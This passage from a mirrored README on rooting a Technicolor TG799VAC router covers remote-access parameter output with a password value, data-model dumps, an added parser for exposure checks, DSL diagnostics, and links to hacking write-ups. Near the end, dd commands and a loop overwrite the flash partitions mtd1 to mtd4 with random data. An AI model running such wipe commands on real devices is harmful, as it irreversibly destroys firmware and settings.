InternetGatewayDevice.Services.X_000E50_RemoteAccess.1.Password [string] = bWi9k7KUF$
InternetGatewayDevice.Services.X_000E50_RemoteAccess.1.Secure [boolean] = 1
InternetGatewayDevice.Services.X_000E50_RemoteAccess.1.Name [string] = remote
InternetGatewayDevice.Services.X_000E50_RemoteAccess.1.Status [string] = Active
InternetGatewayDevice.Services.X_000E50_RemoteAccess.1.Start [boolean] = 1
InternetGatewayDevice.Services.X_000E50_RemoteAccess.1.Mode [string] = Permanent
InternetGatewayDevice.Services.X_000E50_RemoteAccess.1.RandomPort [boolean] = 0
InternetGatewayDevice.Services.X_000E50_RemoteAccess.1.URL [string] = https://10.149.37.203:60443
  • dmdump, the XML file will contain over 13k lines
dmdump
loaded 325 objecttypes from /usr/share/transformer/mappings/igd/ and /usr/share/transformer/mappings/bbf/
could not add NumberOfEntries parameters for:
  Device.Routing.Router.{i}.: IPv4ForwardingNumberOfEntries
  Device.DHCPv4.Client.{i}.: SentOptionNumberOfEntries
  Device.Users.: UserNumberOfEntries
  Device.X_Management.: UserNumberOfEntries
  Device.WiFi.NeighboringWiFiDiagnostic.: ResultNumberOfEntries
  InternetGatewayDevice.X_Management.: UserNumberOfEntries
  #ROOT.: LANWLANConfigurationNumberOfEntries
  Device.DHCPv4.Server.Pool.{i}.: OptionNumberOfEntries
datamodel written to /tmp/datamodel.xml
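A parser for the clash `get` output of `X_000E50_RemoteAccess` shown above, added here as an example (not the README's or Technicolor's code): it turns the typed `path.Param [type] = value` lines into Python values and reports whether the ISP's remote-access instance is active and which of its properties (permanent mode, fixed port, static password, plain HTTP) widen exposure. The sample lines are constructed after the page's output, with the password value replaced.

```python
"""Added example, not part of the original README: parse the clash output of
`get InternetGatewayDevice.Services.X_000E50_RemoteAccess.` and summarise
whether ISP remote access is currently reachable on the device."""
import re
from typing import Any

# One parameter line as clash prints it:  <object path>.<Param> [<type>] = <value>
LINE_RE = re.compile(r"^(?P<obj>\S+)\.(?P<param>\w+) \[(?P<type>\w+)\] = (?P<value>.*)$")

# Constructed sample, modelled on the page's output; the password is replaced.
SAMPLE = """\
root>get InternetGatewayDevice.Services.X_000E50_RemoteAccess.
InternetGatewayDevice.Services.X_000E50_RemoteAccess.1.IPIntf [string] = InternetGatewayDevice.WANDevice.2.WANConnectionDevice.1.WANIPConnection.4
InternetGatewayDevice.Services.X_000E50_RemoteAccess.1.User [string] = assist
InternetGatewayDevice.Services.X_000E50_RemoteAccess.1.Port [unsignedInt] = 60443
InternetGatewayDevice.Services.X_000E50_RemoteAccess.1.RandomPassword [boolean] = 1
InternetGatewayDevice.Services.X_000E50_RemoteAccess.1.Password [string] = <redacted>
InternetGatewayDevice.Services.X_000E50_RemoteAccess.1.Secure [boolean] = 1
InternetGatewayDevice.Services.X_000E50_RemoteAccess.1.Name [string] = remote
InternetGatewayDevice.Services.X_000E50_RemoteAccess.1.Status [string] = Active
InternetGatewayDevice.Services.X_000E50_RemoteAccess.1.Start [boolean] = 1
InternetGatewayDevice.Services.X_000E50_RemoteAccess.1.Mode [string] = Permanent
InternetGatewayDevice.Services.X_000E50_RemoteAccess.1.RandomPort [boolean] = 0
InternetGatewayDevice.Services.X_000E50_RemoteAccess.1.URL [string] = https://10.149.37.203:60443
"""


def coerce(type_name: str, raw: str) -> Any:
    """Map the TR-069 style type tag to a Python value."""
    raw = raw.strip()
    if type_name == "boolean":
        return raw in ("1", "true")
    if type_name in ("unsignedInt", "int"):
        return int(raw)
    return raw


def parse_get(output: str) -> dict[str, dict[str, Any]]:
    """Group parameters by object instance path; the echoed prompt line is skipped."""
    objects: dict[str, dict[str, Any]] = {}
    for line in output.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            objects.setdefault(m["obj"], {})[m["param"]] = coerce(m["type"], m["value"])
    return objects


def remote_access_report(objects: dict[str, dict[str, Any]]) -> list[str]:
    """One summary line per RemoteAccess instance, then the properties worth noting."""
    findings = []
    for path, p in objects.items():
        if "X_000E50_RemoteAccess" not in path:
            continue
        active = p.get("Status") == "Active" and bool(p.get("Start", False))
        state = "ACTIVE" if active else "inactive"
        findings.append(f"{path}: {state}, user={p.get('User')}, port={p.get('Port')}, url={p.get('URL')}")
        if active:
            if p.get("Mode") == "Permanent":
                findings.append(f"{path}: permanent session, not time-limited")
            if not p.get("RandomPort", True):
                findings.append(f"{path}: fixed port {p.get('Port')}")
            if not p.get("RandomPassword", True):
                findings.append(f"{path}: static password")
            if not p.get("Secure", True):
                findings.append(f"{path}: not TLS protected")
    return findings


if __name__ == "__main__":
    for finding in remote_access_report(parse_get(SAMPLE)):
        print(finding)
```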

XDSLCtl

xdslctl info --cfg
xdslctl info --state
xdslctl info --stats
xdslctl info --SNR
xdslctl info --QLN
xdslctl info --Hlog
xdslctl info --Hlin
xdslctl info --HlinS
xdslctl info --pbParams
xdslctl info --vendor
root>xdslctl profile --show

Modulations:
        G.Dmt   Enabled
        G.lite  Enabled
        T1.413  Enabled
        ADSL2   Enabled
        AnnexL  Enabled
        ADSL2+  Enabled
        AnnexM  Enabled
        VDSL2   Enabled
VDSL2 profiles:
        8a      Enabled
        8b      Enabled
        8c      Enabled
        8d      Enabled
        12a     Enabled
        12b     Enabled
        17a     Enabled
        30a     Disabled
        US0     Enabled
Phone line pair:
        Inner pair
Capability:
        bitswap         On
        sra             On
        trellis         On
        sesdrop         On
        CoMinMgn        On
        24k             On
        phyReXmt(Us/Ds) Off/On
        Ginp(Us/Ds)     On/On
        TpsTc           AvPvAa
        monitorTone:    On
        dynamicD:       On
        dynamicF:       Off
        SOS:            On
        Training Margin(Q4 in dB):      -1(DEFAULT)
,- W-A-R-N-I-N-G------------------------------------------------------,
|                                                                     |
|   - ALL STUFF BELOW MAY BE DANGEROUS AND IT MAY BRICK YOUR DEVICE   |
|   - IT IS YOUR DEVICE and YOU HAVE BEEN WARNED                      |
|   - I AM TRYING EVERYTHING THAT IS POSSIBLE TO HACK ANY DEVICE SO   |
|   - YOU RUN ALL STUFF BELOW AT YOUR OWN RISK WITHOUT WARNINGS       |
|                                                                     |
'---------------------------------------------------------------E-N-D-'
  • When it's time to send your device back, because Telia is sending you a new one:

  • THIS IS FOR VBNT-H only

dd if=/dev/urandom of=/dev/mtd1 ## (rootfs      - firmware) 
dd if=/dev/urandom of=/dev/mtd2 ## (rootfs_data - settings)
dd if=/dev/urandom of=/dev/mtd3 ## (bank_1      - bankversion)
dd if=/dev/urandom of=/dev/mtd4 ## (bank_2      - bankversion)
  • In a one-liner:
for mtd in mtd1 mtd2 mtd3 mtd4; do dd if=/dev/urandom of=/dev/${mtd}; done

Some other URLs for TG799 hacking, you all rock \m/ -_- \m/

https://weaponizedautism.wordpress.com/2017/07/14/vulnerabilities-in-technicolor-adsl-residential-gateways/
https://hack-technicolor.readthedocs.io/
https://forums.whirlpool.net.au/archive/2650998
https://www.crc.id.au/hacking-the-technicolor-tg799vac-and-unlocking-features/
https://full-disclosure.eu/reports/2019/FDEU-CVE-2019-10222-telia-savitarna-backdoor.html

Get In Touch

If you have any problems, questions, ideas or suggestions, please don't hesitate to get in touch. More information on how to contact me and my GPG key can be found at https://www.nr1.nu/ and, for questions only, send a message to [email protected] as a normal mail.

Please keep in mind, for private information or secret things that should stay between us, use my GPG key and encrypt the email, because I won't answer you otherwise; that's how I want it.

That's it, thanks for your support everyone.

The End

Open Source Agenda is not affiliated with "TG799VAC XTREME 17.2 MINT" Project. README Source: wuseman/TG799VAC-XTREME-17.2-MINT
